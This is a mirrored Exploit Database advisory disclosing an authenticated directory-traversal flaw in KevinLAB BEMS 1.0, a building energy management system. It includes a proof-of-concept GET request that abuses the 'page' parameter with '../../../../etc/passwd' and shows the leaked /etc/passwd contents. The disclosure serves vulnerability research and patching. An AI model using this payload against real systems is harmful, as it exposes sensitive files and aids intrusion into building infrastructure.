KevinLAB BEMS 1.0 – File Path Traversal Information Disclosure (Authenticated)

• Exploit Database
• 115 阅读

• 作者： LiquidWorm
  日期： 2021-07-21
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50147/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58

  # Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com   Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)   Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.   Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.   Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience     Advisory ID: ZSL-2021-5656 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php     05.07.2021   --     GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1   root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ... ...